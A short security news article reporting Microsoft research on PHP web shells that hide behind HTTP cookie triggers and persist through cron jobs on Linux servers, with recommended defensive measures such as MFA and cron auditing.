Microsoft Details Cookie-Controlled PHP Web Shells Persisting via Cron on Linux Servers

The latest research from Microsoft reveals that threat actors are repurposing HTTP cookies as a silent command conduit for PHP‑based web shells on Linux hosts. By embedding execution triggers and encoded payloads inside the `$_COOKIE` superglobal, malicious code can stay invisible during normal page requests and only awaken when a crafted cookie arrives. This method blends with legitimate traffic, evading signature‑based scanners and reducing alerts in web‑application firewalls. As PHP remains a staple for many SaaS and hosting platforms, the technique poses a broad attack surface across the cloud ecosystem.

The researchers also documented a self‑healing persistence layer that leverages cron jobs to periodically invoke an obfuscated PHP loader. Even if defenders manually delete the malicious file, the scheduled task recreates it, guaranteeing a reliable foothold. Because the loader stays dormant until the correct cookie is presented, conventional log monitoring often misses the activation event. This separation of persistence (cron) and execution (cookie) creates a low‑noise footprint, complicating incident response and forcing security teams to broaden their detection criteria beyond URL parameters and request bodies.

Microsoft’s advisory stresses hardening of access controls and vigilant cron auditing as immediate countermeasures. Enforcing multi‑factor authentication on hosting panels, SSH, and admin interfaces reduces the chance of credential theft that often precedes shell deployment. Continuous monitoring for anomalous cron entries, unexpected PHP files in web directories, and unusual cookie patterns can surface the hidden infrastructure before it matures. As the technique matures, security vendors are expected to embed cookie‑analysis modules into web‑application firewalls and SIEMs, while developers should adopt strict input validation to neutralize malicious `$_COOKIE` payloads.